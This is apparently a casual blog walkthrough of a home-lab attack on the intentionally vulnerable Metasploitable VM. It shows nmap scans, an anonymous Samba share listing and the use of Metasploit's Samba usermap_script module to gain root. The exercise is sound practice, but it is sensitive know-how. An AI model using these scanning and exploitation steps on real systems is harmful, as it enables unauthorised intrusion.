The title is really interest for me because i’m not very good well at metasploit. I will learn more about it later, Ok Let’s try to exploit. Start scanning the network with Nmap.
┌─[[email protected]]─[~/Desktop] └──> nmap 192.168.1.* -sn -n Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-09 13:12 +0630 Nmap scan report for 192.168.1.1 Host is up (0.0011s latency). MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies) Nmap scan report for 192.168.1.73 Host is up (0.00036s latency). MAC Address: 00:0C:29:99:B5:74 (VMware) Nmap scan report for 192.168.1.74 Host is up (0.0076s latency). MAC Address: 40:A5:EF:DC:A7:62 (Shenzhen Four Seas Global Link Network Technology) Nmap scan report for 192.168.1.100 Host is up (0.00051s latency). MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer) Nmap scan report for 192.168.1.101 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 1.27 seconds
Target ip is 192.1681.73. 😉 . Let’s try another scan again.
┌─[[email protected]]─[~/Desktop] └──> nmap -sV 192.168.1.73 Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-09 13:13 +0630 Nmap scan report for kioptrix3.com (192.168.1.73) Host is up (0.0015s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.1 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 MAC Address: 00:0C:29:99:B5:74 (VMware) Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.79 seconds
woo! a lot of service are running there, I always love to check port 80 but now Samba is more interest than http. So i try to connect Samba first.
┌─[[email protected]]─[~/Desktop] └──> smbclient -L 192.168.1.73 WARNING: The "syslog" option is deprecated Enter WORKGROUP\root's password: Anonymous login successful Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) Reconnecting with SMB1 for workgroup listing. Anonymous login successful Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP METASPLOITABLE
Anonymous login success and get the Samba version number. Start search this version on google.
https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
Yeah! I found, it can be exploit with metasploit. let’s exploit it. Open metasploit and use use exploit/multi/samba/usermap_script and exploit.
Got Root. Sample and easy with metasploit! 🙂 . Thanks for reading. Happy Hacking.
Note – There are many vulnerable to exploit this machine.